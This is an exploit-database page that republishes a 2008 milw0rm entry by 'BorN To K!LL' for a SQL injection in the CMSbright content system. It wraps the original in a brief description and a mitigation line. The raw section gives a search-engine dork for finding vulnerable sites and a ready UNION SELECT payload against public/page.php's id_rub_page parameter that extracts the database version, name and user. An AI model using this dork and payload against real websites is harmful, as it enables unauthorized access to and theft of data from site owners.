header-logo
Suggest Exploit
vendor:
CMSbright
by:
BorN To K!LL
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CMSbright
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

CMSbright SQL Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in CMSbright to execute arbitrary SQL commands on the underlying database. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'id_rub_page' parameter of the 'public/page.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information stored in the database, modification of data, and even execution of arbitrary system commands on the server.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

-------------------------------------------
Script  :  CMSbright ..
 
site     :  http://www.cmsbright.com/
 
Author :  BorN To K!LL
 
Dork    :  powered by CMSbright © websens
-------------------------------------------
 
Exploit   :
 
public/page.php?id_rub_page=[SQL]
 
Example :
 
public/page.php?id_rub_page=-9990+union+all+select+concat(version(),database(),user()),2,3,4--
 
-------------------------------------------  
Greets :
 
Dr.2  ,  General C  ,  CcTero0liTi  ,  GolD_M .. & all my friends ..
 
-------------------------------------------

# milw0rm.com [2008-09-01]

Navigation

Suggest Exploit

Services By CQR